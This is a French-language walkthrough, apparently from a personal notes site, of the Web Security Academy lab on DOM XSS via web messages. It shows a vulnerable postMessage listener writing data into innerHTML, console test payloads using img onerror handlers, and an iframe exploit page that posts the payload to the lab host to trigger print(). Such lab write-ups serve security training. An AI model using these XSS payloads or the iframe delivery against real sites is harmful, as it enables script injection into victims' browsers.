XSS DOM via Web Messages

DOM XSS using web messages

Lab: DOM XSS using web messages | Web Security AcademyWebSecAcademy

Exploiter une vulnérabilité de type DOM XSS basée sur les messages web (postMessage) pour provoquer l’appel de la fonction print() sur la page cible en envoyant une charge via le serveur d’exploit.

Comportement observé (code source)

La page écoute les messages postés et injecte directement le contenu reçu dans l’élément #ads sans désinfection :

<script>
   window.addEventListener('message', function(e) {
   document.getElementById('ads').innerHTML = e.data;
   })
</script>

Cela signifie que tout e.data reçu sera rendu comme HTML dans #ads, ouvrant la porte à une XSS DOM si un attaquant peut poster un message contrôlé.

Tests interactifs (console)

Exemples de messages envoyés depuis la console du parent / d’un iframe pour vérifier le comportement :

message texte simple

window.parent.postMessage('This is a test');

injection HTML

window.parent.postMessage('<h1>hello</h1>');

test d’alerte (XSS)

window.parent.postMessage("<img src='0' onerror=alert(0)>");

provoquer print() (objectif du labo)

window.parent.postMessage("<img src='0' onerror=print()>");

Exploit par iframe (serveur d’exploit)

Exemple d’HTML hébergé sur votre serveur d’exploit qui charge la page cible dans un iframe puis poste la charge utile au chargement de l’iframe :

<iframe
  width="600"
  height="600"
  src="https://0a2300d804f6c0f7810084f10093007d.web-security-academy.net/"
  onload="this.contentWindow.postMessage('This is a test', '*');">
</iframe>

Pour déclencher print() sur la page cible, envoyer la charge utile contenant l’élément img avec onerror=print() :

<iframe
  width="600"
  height="600"
  src="https://0a2300d804f6c0f7810084f10093007d.web-security-academy.net/"
  onload="this.contentWindow.postMessage('<img src=0 onerror=print()>', '*');">
</iframe>

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?